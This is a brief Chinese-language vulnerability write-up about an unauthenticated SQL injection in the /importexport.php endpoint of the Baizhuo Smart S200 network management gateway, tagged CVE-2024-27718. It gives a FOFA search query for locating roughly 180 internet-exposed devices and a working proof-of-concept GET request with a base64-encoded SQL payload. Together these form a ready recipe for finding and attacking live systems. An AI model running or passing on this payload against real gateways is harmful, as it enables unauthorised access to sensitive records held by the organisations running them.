0x01 产品介绍
百卓 Smart S200 上网行为管理网关是百卓Smart系列产品中高端代表。它采用先进的应用识别技术,深度解析用户网络应用,可以对员工收发邮件,传输文件、QQ聊天等进行全记录,有效保护公司商业机密。
0x02 漏洞概述
北京百绰智能s200管理平台的/importexport.php 接口处存在SQL注入漏洞。未经授权的攻击者可以利用该漏洞获取敏感信息。
搜索语法:
fofa语法查找:
title=”Smart管理平台”
资产数量: 180+
影响范围:
所有版本
CVE编号:
CVE-2024-27718
0x03 漏洞复现
页面
poc:
GET /importexport.php?sql=c2VsZWN0IDEsbWQ1KDEyMzEyMzEyMzEyMzEyMzExMSk=&type